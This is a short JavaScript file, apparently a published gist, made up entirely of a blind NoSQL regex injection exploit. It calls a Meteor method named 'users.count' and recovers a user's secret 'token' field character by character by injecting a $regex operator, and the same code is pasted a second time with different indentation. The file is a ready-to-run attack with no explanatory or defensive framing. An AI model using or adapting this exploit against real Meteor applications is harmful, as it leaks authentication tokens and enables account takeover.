ojasookert/meteor-regex-blind-nosql.js

## meteor-regex-blind-nosql.js
(function exploit(user, field, alphabet, data = '', index = 0) {
  Meteor.call('users.count', {username: user, [field] : {$regex: '^' + data + alphabet[index] + '.*'}}, (err, res) => {
    console.log('^' + data + alphabet[index] + '.*', res);
    if (res == 0) {
      index++;
    } else {
      data += alphabet[index];
      index = 0;
    }
    if (index >= alphabet.length) {
      console.log("Done", data);
      return;
    }
    setTimeout(() => {
      exploit(user, field, alphabet, data, index);
    });
  });
})('kertojasoo', 'token', '0123456789abcdef'.split(''));
	(function exploit(user, field, alphabet, data = '', index = 0) {
	Meteor.call('users.count', {username: user, [field] : {$regex: '^' + data + alphabet[index] + '.*'}}, (err, res) => {
	console.log('^' + data + alphabet[index] + '.*', res);
	if (res == 0) {
	index++;
	} else {
	data += alphabet[index];
	index = 0;
	}
	if (index >= alphabet.length) {
	console.log("Done", data);
	return;
	}
	setTimeout(() => {
	exploit(user, field, alphabet, data, index);
	});
	});
	})('kertojasoo', 'token', '0123456789abcdef'.split(''));